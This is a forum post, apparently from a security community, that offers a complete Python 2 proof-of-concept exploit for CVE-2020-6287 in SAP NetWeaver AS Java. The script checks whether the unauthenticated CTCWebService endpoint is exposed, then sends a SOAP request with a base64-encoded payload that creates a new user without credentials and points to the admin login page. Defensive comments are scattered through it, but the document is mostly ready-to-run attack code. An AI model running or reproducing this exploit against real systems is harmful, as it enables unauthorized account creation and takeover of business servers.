SAP NetWeaver AS JAVA 任意用户添加

POC SAP NetWeaver AS JAVA 任意用户添加

Shacker已验证会员

Python 2:
#from ducnt import <3
import requests
import base64
import sys


def check_vulnerable(_url):
    """Report whether the target serves the CTCWebService WSDL.

    Sends a single GET, carrying no credentials, to
    ``<_url>/CTCWebService/CTCWebServiceBean?wsdl``. Returns True when the
    reply is HTTP 200 and the body contains ``urn:CTCWebServiceSi``, and
    False otherwise; the verdict is also printed to stdout.

    The check is a reachability heuristic only: it shows that the endpoint
    answered an unauthenticated request, and nothing more is tested here.
    Exceptions raised by ``requests`` (timeout, connection failure) are not
    caught in this function.

    Defensive reading: a request for this path in HTTP access logs is worth
    reviewing, and the path should not be answered for unauthenticated
    clients on an Internet-facing system.
    """
    url = _url+"/CTCWebService/CTCWebServiceBean?wsdl"

    # Static header set. The User-Agent is hard-coded, so it can serve as a
    # weak indicator of this exact script in access logs.
    _headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "text/xml;charset=UTF-8", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    # verify=False turns off TLS certificate validation for this request.
    r = requests.get(url, headers=_headers, verify=False, timeout=5)
    # Marker test: the service namespace in the body plus a 200 status.
    if "urn:CTCWebServiceSi" in r.content and r.status_code == 200:
        print "Vulnerable"
        return True
    else:
        print "Not Vulnerable, matane :("
        return False


def add_user(_url, _username, _passwd):
    """Submit a user-creation request to the CTCWebService ConfigServlet.

    Calls check_vulnerable(_url) first and does nothing further when it
    returns False. Otherwise it POSTs one SOAP envelope, with no credentials
    attached, to ``<_url>/CTCWebService/CTCWebServiceBean/ConfigServlet``.
    The envelope names the ``SPC_UserManagement.cproc`` content path and
    carries the username and password as a base64-encoded XML fragment.
    The function returns None on every path; its only output is printed text,
    which includes the submitted credentials in clear.

    Defensive reading (CVE-2020-6287 is the identifier given in this script's
    usage text): an unauthenticated POST to this path should be rejected.
    Review access logs for requests to ``/CTCWebService/``, audit the user
    store for accounts created outside change control, apply the vendor's fix
    for the CVE, and restrict network access to the path.
    """
    _check = check_vulnerable(_url)
    if _check:
        url = _url+"/CTCWebService/CTCWebServiceBean/ConfigServlet"

        # Same static header set as the probe request, including the
        # hard-coded User-Agent.
        _headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "text/xml;charset=UTF-8", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

        # Inner XML document holding the requested account details.
        _payload = "<root>  <user>    <JavaOrABAP>java</JavaOrABAP>    <username>"+str(_username)+"</username>    <password>"+str(_passwd)+"</password>    <userType></userType>  </user></root>"
        # Python 2 'base64' str codec; the result goes into <baData> below.
        _payload = _payload.encode('base64')
        # SOAP envelope for the executeSynchronious operation.
        _data = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\">  <soapenv:Header/>  <soapenv:Body>    <urn:executeSynchronious>        <identifier>          <component>sap.com/tc~lm~config~content</component>          <path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>       </identifier>       <contextMessages>          <baData>"+str(_payload)+"</baData>          <name>userDetails</name>       </contextMessages>    </urn:executeSynchronious>   </soapenv:Body></soapenv:Envelope>"
        # verify=False turns off TLS certificate validation for this request.
        r = requests.post(url, headers=_headers, verify=False, data=_data, timeout=10)

        # NOTE(review): success is inferred from the same namespace marker and
        # a 200 status; the response is not parsed, so this does not confirm
        # that an account was actually created. Nothing is printed otherwise.
        if "urn:CTCWebServiceSi" in r.content and r.status_code == 200:
            print "Add user successfully with credential:\nUsername: ",_username," ==== Password: ",_passwd
            print "Login at: \n",_url+"/nwa"

def main():
    """Command-line entry point: read the base URL, username and password.

    Expects three positional arguments after the script name. With fewer,
    it prints the usage line and exits; otherwise it passes the values,
    unvalidated, to add_user(). The listing uses Python 2 print statements.
    """
    if len(sys.argv) < 4:
        print "Usage: python sap-CVE-2020-6287-add-user.py <HTTP(s)://IP:Port <username> <passwd>"
        # exit() with no argument ends the process with status 0, so a
        # wrapper script cannot tell a usage error from a normal run.
        exit()
    _url = sys.argv[1]
    _username = sys.argv[2]
    _passwd = sys.argv[3]
    add_user(_url, _username, _passwd)


# Run the command-line entry point only when the file is executed as a
# script, not when it is imported as a module.
if __name__ == "__main__":
    main()
 